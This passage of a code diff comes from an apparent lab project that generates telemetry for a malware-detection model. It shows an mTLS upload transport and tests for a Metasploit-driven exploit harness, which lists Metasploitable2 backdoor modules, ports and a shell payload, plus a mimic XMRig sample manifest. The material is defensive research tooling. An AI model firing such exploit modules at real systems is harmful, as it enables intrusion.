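    print(leftovers, sha[:12])
```

Hashing the partial before the rename, as the original does, means the sha256 sent in `X-Content-SHA256` always describes the exact bytes that end up under the final name.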
--- a/shipper/transport.py
+++ b/shipper/transport.py
@ -0,0 +1,203 @@
+"""HTTP transport for the lab-host shipper.
+
+Two operations against the receiver:
+  POST /v1/ping                                  — smoke test
+  PUT  /v1/episodes/<host>/<episode>.tar.zst     — episode upload
+
+Auth is mTLS (client cert from wg-pki) when configured. A bearer token
+is supported as a stand-in during early bring-up before the cert is
+issued; production runs should set both.
+
+The transport returns small dataclasses rather than throwing — the
+caller (shipper queue) decides whether to retry, move to shipped/, or
+alert. This keeps the retry policy in one place.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import logging
+import ssl
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Any
+
+import httpx
+
+from .config import ReceiverEndpoint, ShipperConfig
+
+
+log = logging.getLogger("cis490.shipper.transport")
+
+
+SCHEMA_VERSION = 1
+
+
+@dataclass(frozen=True)
+class PingResult:
+    ok: bool
+    status_code: int
+    body: dict[str, Any] | None
+    error: str | None
+
+
+@dataclass(frozen=True)
+class ShipResult:
+    status: str               # "stored" | "already-present" | "conflict" | "transient" | "fatal"
+    status_code: int
+    sha256: str | None
+    body: dict[str, Any] | None
+    error: str | None
+
+
+def _build_ssl_context(rcv: ReceiverEndpoint) -> ssl.SSLContext | bool:
+    """Build an SSL context honoring the wg-pki CA bundle + client cert.
+
+    Returns False for non-HTTPS URLs, otherwise an ``ssl.SSLContext``.
+    httpx's ``verify=`` accepts either; we build a context so we can
+    attach the client cert for mTLS."""
+    if not rcv.url.lower().startswith("https://"):
+        return False
+    ctx = ssl.create_default_context(
+        cafile=str(rcv.ca_bundle) if rcv.ca_bundle else None,
+    )
+    if not rcv.verify_tls:
+        # Dev-only path; production lab-hosts should always pin the
+        # wg-pki CA. Logged loudly so it doesn't slip through.
+        log.warning("TLS verification disabled — dev-only configuration")
+        ctx.check_hostname = False
+        ctx.verify_mode = ssl.CERT_NONE
+    if rcv.client_cert and rcv.client_key:
+        ctx.load_cert_chain(str(rcv.client_cert), str(rcv.client_key))
+    return ctx
+
+
+class ShipperTransport:
+    def __init__(self, cfg: ShipperConfig) -> None:
+        self.cfg = cfg
+        self._verify = _build_ssl_context(cfg.receiver)
+
+    # ---- ping ----------------------------------------------------------
+
+    def ping(self) -> PingResult:
+        url = f"{self.cfg.receiver.url}/v1/ping"
+        headers = self._common_headers()
+        try:
+            with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c:
+                r = c.post(url, headers=headers, content=b"")
+        except httpx.HTTPError as e:
+            return PingResult(ok=False, status_code=0, body=None, error=str(e))
+
+        body: dict[str, Any] | None = None
+        try:
+            body = r.json()
+        except Exception:
+            pass
+
+        if r.status_code == 200 and isinstance(body, dict) and body.get("ok"):
+            return PingResult(ok=True, status_code=200, body=body, error=None)
+        return PingResult(
+            ok=False,
+            status_code=r.status_code,
+            body=body,
+            error=f"unexpected status {r.status_code}",
+        )
+
+    # ---- ship ----------------------------------------------------------
+
+    def ship_tarball(
+        self,
+        episode_id: str,
+        tarball_path: Path,
+        sha256_hex: str,
+    ) -> ShipResult:
+        url = (
+            f"{self.cfg.receiver.url}/v1/episodes/"
+            f"{self.cfg.host_id}/{episode_id}.tar.zst"
+        )
+        size = tarball_path.stat().st_size
+        headers = self._common_headers() | {
+            "Content-Type": "application/zstd",
+            "Content-Length": str(size),
+            "X-Content-SHA256": sha256_hex,
+            "X-Episode-Id": episode_id,
+        }
+
+        try:
+            with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c, \
+                    tarball_path.open("rb") as body:
+                # httpx streams from a file-like object via the `content=` kwarg.
+                r = c.put(url, headers=headers, content=body)
+        except httpx.HTTPError as e:
+            return ShipResult(
+                status="transient",
+                status_code=0,
+                sha256=None,
+                body=None,
+                error=str(e),
+            )
+
+        body_json: dict[str, Any] | None = None
+        try:
+            body_json = r.json()
+        except Exception:
+            pass
+
+        if r.status_code == 201:
+            return ShipResult(
+                status="stored",
+                status_code=201,
+                sha256=sha256_hex,
+                body=body_json,
+                error=None,
+            )
+        if r.status_code == 200:
+            return ShipResult(
+                status="already-present",
+                status_code=200,
+                sha256=sha256_hex,
+                body=body_json,
+                error=None,
+            )
+        if r.status_code == 409:
+            return ShipResult(
+                status="conflict",
+                status_code=409,
+                sha256=sha256_hex,
+                body=body_json,
+                error="receiver already has a different sha256 for this id",
+            )
+        if 500 <= r.status_code < 600:
+            return ShipResult(
+                status="transient",
+                status_code=r.status_code,
+                sha256=None,
+                body=body_json,
+                error=f"server error {r.status_code}",
+            )
+        # 4xx other than 409: caller-side bug — don't retry.
+        return ShipResult(
+            status="fatal",
+            status_code=r.status_code,
+            sha256=None,
+            body=body_json,
+            error=f"client error {r.status_code}",
+        )
+
+    # ---- helpers -------------------------------------------------------
+
+    def _common_headers(self) -> dict[str, str]:
+        h: dict[str, str] = {
+            "X-Lab-Host": self.cfg.host_id,
+            "X-Schema-Version": str(SCHEMA_VERSION),
+        }
+        if self.cfg.receiver.bearer_token:
+            h["Authorization"] = f"Bearer {self.cfg.receiver.bearer_token}"
+        return h
+
+
+def hash_file(path: Path) -> str:
+    h = hashlib.sha256()
+    with path.open("rb") as f:
+        for chunk in iter(lambda: f.read(1024 * 1024), b""):
+            h.update(chunk)
+    return h.hexdigest()
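
Reviewer note: the status handling in `ship_tarball()` reduces to a small pure mapping, which is easy to unit-test without a receiver. The sketch below mirrors the branch order in the method. The standalone helper `classify_status` is a hypothetical refactor, not code from the repo.

```python
def classify_status(status_code: int) -> str:
    """Map a receiver HTTP status to the shipper's outcome label.

    Mirrors the branch order in ShipperTransport.ship_tarball(); this
    standalone helper is a hypothetical refactor, not code from the repo.
    """
    if status_code == 201:
        return "stored"
    if status_code == 200:
        return "already-present"
    if status_code == 409:
        return "conflict"
    if 500 <= status_code < 600:
        return "transient"
    # Everything else (including 4xx other than 409) is not retried.
    return "fatal"


# Outcomes that let the queue retire the episode (see ShipperQueue.run_once).
RETIRE = {"stored", "already-present"}

for code in (201, 200, 409, 503, 400):
    label = classify_status(code)
    print(code, label, "retire" if label in RETIRE else "keep")
```

Network-level failures never reach this mapping: the transport reports them as `transient` with `status_code=0` from its `httpx.HTTPError` handler.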
--- a/tests/test_episode.py
+++ b/tests/test_episode.py
@ -74,6 +74,57 @@ def test_episode_id_can_be_overridden(tmp_path: Path) -> None:
    assert result.episode_dir == tmp_path / "episodes" / "01TEST"


+def test_meta_sample_records_full_sample_when_passed(tmp_path: Path) -> None:
+    """EpisodeConfig.sample → meta.sample carries identity + kind so
+    trainers can join episodes by family/sha256 without re-deriving
+    from events. With no Sample, meta.sample stays null."""
+    import os as _os
+
+    from samples.manifest import Sample
+
+    s = Sample(
+        name="xmrig-cryptominer",
+        family="XMRig",
+        category="cryptominer",
+        profile="cpu-saturate",
+        sha256="abc" * 21 + "d",  # 64 hex
+        source="MalwareBazaar",
+    )
+    cfg = EpisodeConfig(
+        target_pid=_os.getpid(),
+        duration_s=0.1,
+        interval_ms=50,
+        data_root=tmp_path,
+        sample=s,
+    )
+    result = EpisodeRunner(cfg).run()
+
+    meta = json.loads((result.episode_dir / "meta.json").read_text())
+    assert meta["sample"] is not None
+    assert meta["sample"]["name"] == "xmrig-cryptominer"
+    assert meta["sample"]["family"] == "XMRig"
+    assert meta["sample"]["category"] == "cryptominer"
+    assert meta["sample"]["profile"] == "cpu-saturate"
+    assert meta["sample"]["kind"] == "real"
+    assert meta["sample"]["sha256"] == "abc" * 21 + "d"
+
+
+def test_meta_sample_is_null_for_v1_path(tmp_path: Path) -> None:
+    """No sample passed → the v1 fallback path. meta.sample stays
+    null so trainers can detect (and filter out) info-less runs."""
+    import os as _os
+
+    cfg = EpisodeConfig(
+        target_pid=_os.getpid(),
+        duration_s=0.1,
+        interval_ms=50,
+        data_root=tmp_path,
+    )
+    result = EpisodeRunner(cfg).run()
+    meta = json.loads((result.episode_dir / "meta.json").read_text())
+    assert meta["sample"] is None
+
+
 def test_episode_writes_done_marker_last(tmp_path: Path) -> None:
    """done.marker should not appear until meta.json has ended_at_wall set."""
    cfg = EpisodeConfig(
--- a/tests/test_exploits.py
+++ b/tests/test_exploits.py
@ -0,0 +1,484 @@
+"""Tests for the Tier-3 exploit driver and its module loader.
+
+The msfrpc transport itself is exercised against a fake client so the
+suite runs in-process. A live-msfrpcd integration test is out of
+scope here — the wire format is small and the high-value coverage is
+the phase-to-action mapping plus the events the driver emits.
+"""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+from typing import Any
+
+import pytest
+
+from exploits.driver import DriverConfig, MSFExploitDriver
+from exploits.modules import ModuleConfig, load_module_config
+
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+MODULES_DIR = REPO_ROOT / "exploits" / "modules"
+
+
+# -----------------------------------------------------------------------
+# Module config loader
+# -----------------------------------------------------------------------
+
+def test_module_catalog_has_at_least_five_metasploitable2_vectors() -> None:
+    """The fleet's entry-vector variety depends on the module catalog
+    being populated. Five Metasploitable2 vectors is the minimum
+    that gives the trainer a non-trivial diversity of armed →
+    infecting transition shapes."""
+    from exploits.modules import load_module_configs
+    catalog = load_module_configs(MODULES_DIR)
+    assert len(catalog) >= 5, \
+        f"only {len(catalog)} modules; need at least 5 for fleet variety"
+    names = set(catalog.keys())
+    expected = {
+        "vsftpd_234_backdoor",
+        "samba_usermap_script",
+        "distccd_command_exec",
+        "php_cgi_arg_injection",
+        "unreal_ircd_3281_backdoor",
+    }
+    missing = expected - names
+    assert not missing, f"missing canonical modules: {missing}"
+
+
+def test_load_vsftpd_module_config_round_trip() -> None:
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    assert cfg.name == "vsftpd_234_backdoor"
+    assert cfg.module_type == "exploit"
+    assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor"
+    assert cfg.options["RPORT"] == 21
+    assert cfg.options["RHOSTS"] == "{{ target_ip }}"
+    assert cfg.payload_path == "cmd/unix/interact"
+
+
+def test_render_options_substitutes_target_ip() -> None:
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    rendered = cfg.render_options(target_ip="10.200.0.10")
+    assert rendered["RHOSTS"] == "10.200.0.10"
+    assert rendered["RPORT"] == 21
+    assert rendered["PAYLOAD"] == "cmd/unix/interact"
+
+
+def test_select_module_is_deterministic() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    a = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
+    b = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
+    assert a is b
+
+
+def test_select_module_diversifies_across_hosts() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    matches = 0
+    for slot in range(20):
+        a = select_module(catalog, host_id="alice", slot=slot, episode_index=0)
+        b = select_module(catalog, host_id="bob",   slot=slot, episode_index=0)
+        if a is b:
+            matches += 1
+    assert matches < 15, "host_id seed isn't producing module variety"
+
+
+def test_select_module_walks_catalog() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    seen = set()
+    for ep in range(200):
+        seen.add(select_module(catalog, host_id="lab-x", slot=0, episode_index=ep).name)
+    assert seen == set(catalog.keys()), \
+        f"only saw {len(seen)}/{len(catalog)} modules across 200 episodes"
+
+
+def test_module_target_port_pulls_rport() -> None:
+    from exploits.modules import load_module_configs, module_target_port
+    catalog = load_module_configs(MODULES_DIR)
+    assert module_target_port(catalog["vsftpd_234_backdoor"]) == 21
+    assert module_target_port(catalog["samba_usermap_script"]) == 139
+    assert module_target_port(catalog["distccd_command_exec"]) == 3632
+    assert module_target_port(catalog["php_cgi_arg_injection"]) == 80
+    assert module_target_port(catalog["unreal_ircd_3281_backdoor"]) == 6667
+
+
+def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
+    p = tmp_path / "x.toml"
+    p.write_text(
+        '[module]\n'
+        'type = "exploit"\n'
+        'path = "unix/ftp/example"\n'
+        '[module.options]\n'
+        'RHOSTS = "{{target_ip}}"\n'
+        'LHOST  = "{{ target_ip }}"\n'
+    )
+    cfg = load_module_config(p)
+    rendered = cfg.render_options(target_ip="10.0.0.5")
+    assert rendered["RHOSTS"] == "10.0.0.5"
+    assert rendered["LHOST"] == "10.0.0.5"
+
+
+def test_load_rejects_missing_module_path(tmp_path: Path) -> None:
+    p = tmp_path / "bad.toml"
+    p.write_text('[module]\ntype = "exploit"\n')
+    with pytest.raises(ValueError, match="module.path"):
+        load_module_config(p)
+
+
+def test_load_rejects_unknown_module_type(tmp_path: Path) -> None:
+    p = tmp_path / "bad.toml"
+    p.write_text(
+        '[module]\ntype = "evil"\npath = "unix/ftp/x"\n'
+    )
+    with pytest.raises(ValueError, match="module.type"):
+        load_module_config(p)
+
+
+# -----------------------------------------------------------------------
+# Exploit driver — phase transitions against a fake MSFRpcClient
+# -----------------------------------------------------------------------
+
+class FakeMSFRpcClient:
+    """Stand-in that records every method called and lets a test
+    script the apparent state of msfrpcd (sessions, return values)."""
+
+    def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None:
+        self.calls: list[tuple[str, tuple, dict]] = []
+        self.logged_in = False
+        self._fired = False
+        self._sessions: dict[int, dict[str, Any]] = {}
+        self._sessions_after_fire = sessions_after_fire or {}
+        self.shell_writes: list[tuple[int, str]] = []
+
+    def _record(self, name: str, *args, **kwargs) -> None:
+        self.calls.append((name, args, kwargs))
+
+    def login(self) -> None:
+        self._record("login")
+        self.logged_in = True
+
+    def logout(self) -> None:
+        self._record("logout")
+        self.logged_in = False
+
+    def session_list(self) -> dict[int, dict[str, Any]]:
+        self._record("session_list")
+        return dict(self._sessions)
+
+    def module_execute(self, mtype: str, mname: str, opts: dict) -> dict:
+        self._record("module_execute", mtype, mname, opts)
+        self._fired = True
+        # Simulate sessions appearing after the exploit fires.
+        self._sessions = dict(self._sessions_after_fire)
+        return {"job_id": 7, "uuid": "fake-uuid"}
+
+    def job_stop(self, job_id) -> dict:
+        self._record("job_stop", job_id)
+        return {"result": "success"}
+
+    def session_shell_write(self, sid: int, data: str) -> dict:
+        self._record("session_shell_write", sid, data)
+        if not data.endswith("\n"):
+            data = data + "\n"
+        self.shell_writes.append((sid, data))
+        return {"write_count": str(len(data))}
+
+    def session_shell_read(self, sid: int) -> str:
+        self._record("session_shell_read", sid)
+        return "uid=0(root) gid=0(root)\n"
+
+    def session_stop(self, sid: int) -> dict:
+        self._record("session_stop", sid)
+        self._sessions.pop(sid, None)
+        return {"result": "success"}
+
+
+def _make_driver(
+    sessions_after_fire: dict[int, dict[str, Any]] | None = None,
+    target_ip: str = "10.200.0.10",
+) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]:
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire)
+    events: list[tuple[str, dict]] = []
+
+    def emit(event: str, **extra: Any) -> None:
+        events.append((event, extra))
+
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(
+            target_ip=target_ip,
+            session_open_timeout_s=0.5,  # tests must not block
+        ),
+        emit_event=emit,
+    )
+    return driver, client, events
+
+
+def test_driver_setup_authenticates_and_snapshots_sessions() -> None:
+    driver, client, events = _make_driver()
+    client._sessions = {99: {"type": "shell"}}  # pre-existing session
+    driver.setup()
+    assert client.logged_in is True
+    assert driver._sessions_seen_at_arm == {99}
+    assert events[0][0] == "driver_setup"
+    assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor"
+    assert events[0][1]["target_ip"] == "10.200.0.10"
+
+
+def test_full_phase_walk_emits_expected_event_order() -> None:
+    driver, client, events = _make_driver(
+        sessions_after_fire={1: {"type": "shell", "tunnel_peer": "10.200.0.10:21"}},
+    )
+    driver.setup()
+    for phase in [
+        "clean", "armed", "infecting",
+        "infected_running", "dormant",
+        "infected_running", "dormant",
+        "clean",
+    ]:
+        driver.set_phase(phase)
+    driver.teardown()
+
+    names = [e[0] for e in events]
+    # Order matters: fire precedes session_open, then the landing probe,
+    # then the workload. The kill is only checked for presence.
+    assert names.index("exploit_fire") < names.index("session_open")
+    assert names.index("session_open") < names.index("session_landing_probe")
+    assert names.index("session_landing_probe") < names.index("sample_executed")
+    assert names.count("sample_executed") == 2  # two infected_running phases
+    assert names.count("session_dormant") == 2
+    assert "session_killed" in names
+
+    # Driver should have asked the FakeClient to fire exactly once.
+    fire_calls = [c for c in client.calls if c[0] == "module_execute"]
+    assert len(fire_calls) == 1
+    _, args, _ = fire_calls[0]
+    assert args[1] == "unix/ftp/vsftpd_234_backdoor"
+    assert args[2]["RHOSTS"] == "10.200.0.10"
+    assert args[2]["PAYLOAD"] == "cmd/unix/interact"
+
+
+def test_session_open_timeout_emits_timeout_event() -> None:
+    # No sessions ever appear after fire.
+    driver, client, events = _make_driver(sessions_after_fire={})
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    names = [e[0] for e in events]
+    assert "session_open_timeout" in names
+    assert "session_open" not in names
+
+
+def test_workload_phases_are_no_op_without_session() -> None:
+    driver, client, events = _make_driver(sessions_after_fire={})
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")  # times out, no session
+    driver.set_phase("infected_running")
+    driver.set_phase("dormant")
+    # No shell writes should have happened.
+    assert client.shell_writes == []
+
+
+def test_arm_is_idempotent() -> None:
+    driver, client, events = _make_driver(
+        sessions_after_fire={1: {"type": "shell"}},
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("armed")
+    fire_calls = [c for c in client.calls if c[0] == "module_execute"]
+    assert len(fire_calls) == 1
+
+
+def test_teardown_kills_session_and_logs_out() -> None:
+    driver, client, events = _make_driver(
+        sessions_after_fire={1: {"type": "shell"}},
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    driver.teardown()
+    assert any(c[0] == "session_stop" for c in client.calls)
+    assert client.logged_in is False
+    assert any(e[0] == "session_killed" for e in events)
+
+
+# -----------------------------------------------------------------------
+# Driver wired into a real EpisodeRunner — events land in events.jsonl
+# -----------------------------------------------------------------------
+
+# -----------------------------------------------------------------------
+# Driver v2 — sample-profile-driven workloads
+# -----------------------------------------------------------------------
+
+def test_v2_uses_profile_workload_for_cpu_saturate() -> None:
+    """When constructed with a Sample, the driver should send the
+    profile's start_cmd at infected_running rather than the v1
+    yes-loop. The actual command body is owned by exploits.workloads
+    and tested there; here we just confirm dispatch."""
+    from samples.manifest import Sample as _Sample
+
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(
+        sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
+    )
+    events: list[tuple[str, dict]] = []
+    sample = _Sample(
+        name="xmrig-cryptominer",
+        family="XMRig",
+        category="cryptominer",
+        profile="cpu-saturate",
+    )
+
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
+        emit_event=lambda ev, **kw: events.append((ev, kw)),
+        sample=sample,
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    driver.set_phase("infected_running")
+    driver.set_phase("dormant")
+    driver.teardown()
+
+    # The shell command sent at infected_running should be the
+    # profile's multi-line wrapper, NOT the v1 single-yes line.
+    v1_writes = [w for (_, w) in client.shell_writes if "yes > /dev/null" in w and "cis490-workload" not in w]
+    assert v1_writes == [], "v2 driver must not send the v1 yes-loop when a Sample is supplied"
+
+    # The driver_setup event records sample + workload metadata.
+    setup_events = [kw for (e, kw) in events if e == "driver_setup"]
+    assert setup_events
+    assert setup_events[0]["sample"] == "xmrig-cryptominer"
+    assert setup_events[0]["sample_kind"] == "mimic"
+    assert setup_events[0]["workload_profile"] == "cpu-saturate"
+
+    # sample_executed carries the profile name and the sample name.
+    se = [kw for (e, kw) in events if e == "sample_executed"]
+    assert se
+    assert se[0]["profile"] == "cpu-saturate"
+    assert se[0]["sample"] == "xmrig-cryptominer"
+
+
+def test_v2_distinct_workloads_per_profile() -> None:
+    """Two different profiles must produce *different* shell commands.
+    This is the property that gives the ML model varied envelopes to
+    learn from."""
+    from exploits.workloads import all_profiles, workload_for
+    from samples.manifest import Sample as _Sample
+
+    profiles = all_profiles()
+    assert len(profiles) >= 4
+    seen_starts: set[str] = set()
+    for p in profiles:
+        s = _Sample(name=f"x-{p}", family="X", category="rat", profile=p)
+        w = workload_for(s)
+        assert w is not None
+        seen_starts.add(w.start_cmd)
+    # Every profile must have a distinct start_cmd.
+    assert len(seen_starts) == len(profiles), \
+        "two profiles produced the same workload — ML diversity is at risk"
+
+
+def test_v2_unknown_profile_falls_back_to_cpu_saturate() -> None:
+    from exploits.workloads import workload_for
+    from samples.manifest import Sample as _Sample
+
+    s = _Sample(name="weird", family="X", category="rat", profile="not-a-real-profile")
+    w = workload_for(s)
+    assert w is not None
+    assert w.profile == "cpu-saturate"
+
+
+def test_v1_path_still_works_when_no_sample() -> None:
+    """Ensure backwards compat: a driver constructed without a sample
+    uses the original yes-loop workload."""
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
+        emit_event=lambda *a, **kw: None,
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    driver.set_phase("infected_running")
+    driver.teardown()
+    assert any("yes > /dev/null" in w for (_, w) in client.shell_writes)
+
+
+def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None:
+    """When the driver is connected to a real EpisodeRunner, the
+    events it emits must show up in the episode's events.jsonl with
+    monotonic-clock timestamps (so labels and exploit events can be
+    correlated downstream)."""
+    import os
+
+    from orchestrator.episode import EpisodeConfig, EpisodeRunner
+
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(
+        sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
+    )
+
+    schedule = [
+        ("clean", 0.05),
+        ("armed", 0.05),
+        ("infecting", 0.05),
+        ("infected_running", 0.05),
+        ("dormant", 0.05),
+        ("clean", 0.05),
+    ]
+    ec = EpisodeConfig(
+        target_pid=os.getpid(),
+        duration_s=sum(d for _, d in schedule),
+        interval_ms=20,
+        data_root=tmp_path,
+        phase_schedule=schedule,
+    )
+    runner = EpisodeRunner(ec)
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
+        emit_event=runner.emit_event,
+    )
+    runner.on_phase = driver.set_phase
+    driver.setup()
+    try:
+        result = runner.run()
+    finally:
+        driver.teardown()
+
+    events = [
+        json.loads(line)
+        for line in (result.episode_dir / "events.jsonl").read_text().splitlines()
+    ]
+    names = [e["event"] for e in events]
+    assert "snapshot_load" in names
+    assert "driver_setup" in names
+    assert "exploit_fire" in names
+    assert "session_open" in names
+    assert "sample_executed" in names
+    assert "session_dormant" in names
+    assert "episode_end" in names
+
+    # Driver events must carry monotonic timestamps in episode-relative
+    # order (snapshot_load is essentially at origin, exploit_fire later,
+    # session_open later still, episode_end last).
+    by_name = {e["event"]: e for e in events}
+    assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000  # <1ms after origin
+    assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"]
+    assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"]
+    assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"]
--- a/tests/test_fleet.py
+++ b/tests/test_fleet.py
@ -0,0 +1,392 @@
+"""Tests for fleet capacity calculation + sample manifest selection.
+
+Capacity is unit-tested by monkeypatching the /proc readers and
+os.cpu_count so the math is exercised independently of the host
+running the suite. Sample selection has its own tests covering the
+"different hosts pick different samples" property.
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+
+from orchestrator import fleet
+from samples.manifest import Sample, SampleManifest
+
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+
+
+# ---------------------------------------------------------------------------
+# Capacity
+# ---------------------------------------------------------------------------
+
+
+def _patch_capacity_inputs(
+    monkeypatch,
+    *,
+    cores: int,
+    ram_total_mib: int,
+    ram_available_mib: int,
+    load_1m: float = 0.0,
+) -> None:
+    monkeypatch.setattr(fleet.os, "cpu_count", lambda: cores)
+    monkeypatch.setattr(
+        fleet, "_read_meminfo",
+        lambda: {
+            "MemTotal": ram_total_mib * 1024 * 1024,
+            "MemAvailable": ram_available_mib * 1024 * 1024,
+        },
+    )
+    monkeypatch.setattr(fleet, "_read_loadavg", lambda: load_1m)
+
+
+def test_capacity_8core_idle_box(monkeypatch) -> None:
+    _patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    assert c.cores_total == 8
+    assert c.cores_reserved == 1  # 8 // 8 = 1
+    assert c.max_by_cores == 7
+    # Plenty of RAM, idle → cores binding.
+    assert c.max_concurrent == 7
+    assert "binding=cores" in c.rationale
+
+
+def test_capacity_low_ram_caps_below_cores(monkeypatch) -> None:
+    # 8 cores but only ~2 GiB free → ram caps below cores.
+    _patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=4096, ram_available_mib=2048)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    # headroom = max(1024, 4096//8) = 1024
+    # max_by_ram = (2048 - 1024) // 320 = 3
+    assert c.max_by_ram == 3
+    assert c.max_concurrent == 3
+
+
+def test_capacity_high_load_halves_concurrency(monkeypatch) -> None:
+    # 8 cores, plenty of RAM, but load_1m / cores > 0.75
+    _patch_capacity_inputs(
+        monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000,
+        load_1m=7.0,  # 7/8 = 0.875 > 0.75
+    )
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    # max_by_cores = 7; max_by_load = max(1, 7//2) = 3
+    assert c.max_by_load == 3
+    assert c.max_concurrent == 3
+
+
+def test_capacity_pi5_class(monkeypatch) -> None:
+    """4 cores + 8 GiB → reserve 1 core, run 3 concurrent."""
+    _patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=7951, ram_available_mib=5223)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    assert c.cores_total == 4
+    assert c.max_concurrent == 3
+
+
+def test_capacity_minimal_box(monkeypatch) -> None:
+    """1-core 1 GiB host shouldn't try to run any VMs."""
+    _patch_capacity_inputs(monkeypatch, cores=1, ram_total_mib=1024, ram_available_mib=512)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    assert c.max_concurrent == 0
+
+
+def test_capacity_to_dict_round_trips(monkeypatch) -> None:
+    _patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=8000, ram_available_mib=6000)
+    c = fleet.detect_capacity(ram_per_vm_mib=320)
+    d = c.to_dict()
+    assert d["cores_total"] == 4
+    assert d["max_concurrent"] == c.max_concurrent
+    assert "rationale" in d
+
+
+# ---------------------------------------------------------------------------
+# Sample manifest
+# ---------------------------------------------------------------------------
+
+
+def test_repo_manifest_loads() -> None:
+    m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
+    assert len(m) >= 4
+    # Every entry has required fields.
+    for s in m.samples:
+        assert s.name and s.family and s.category and s.profile
+    # All "mimic" today; will switch as real samples are added.
+    assert all(s.kind == "mimic" for s in m.samples)
+
+
+def test_selection_is_deterministic() -> None:
+    m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
+    a = m.select(host_id="lab-1", slot=2, episode_index=5)
+    b = m.select(host_id="lab-1", slot=2, episode_index=5)
+    assert a is b
+
+
+def test_selection_differs_across_hosts() -> None:
+    """Two hosts on the same slot/episode should generally hit
+    different samples (probabilistic — assert distribution, not
+    individual equality).
+    """
+    m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
+    if len(m) < 2:
+        pytest.skip("manifest too small for diversity check")
+    matches = 0
+    for slot in range(20):
+        a = m.select(host_id="alice", slot=slot, episode_index=0)
+        b = m.select(host_id="bob",   slot=slot, episode_index=0)
+        if a is b:
+            matches += 1
+    # If the catalog has N samples, naive collision rate ~1/N. With 20
+    # trials and N≥4 we expect at most ~5 matches; allow up to 14.
+    assert matches < 15, "host_id seed isn't producing variety"
+
+
+def test_selection_walks_catalog_across_episodes() -> None:
+    """A single host over many episodes should hit every sample at
+    least once."""
+    m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
+    seen = set()
+    for ep in range(200):
+        seen.add(m.select(host_id="lab-x", slot=0, episode_index=ep).name)
+    assert len(seen) == len(m), f"only saw {len(seen)}/{len(m)} samples"
+
+
+def test_manifest_rejects_missing_required_field(tmp_path: Path) -> None:
+    p = tmp_path / "bad.toml"
+    p.write_text(
+        '[[sample]]\n'
+        'name = "x"\n'
+        'family = "y"\n'
+        '# missing category\n'
+        'profile = "z"\n'
+    )
+    with pytest.raises(ValueError, match="category"):
+        SampleManifest.load(p)
+
+
+def test_manifest_rejects_unknown_category(tmp_path: Path) -> None:
+    p = tmp_path / "bad.toml"
+    p.write_text(
+        '[[sample]]\n'
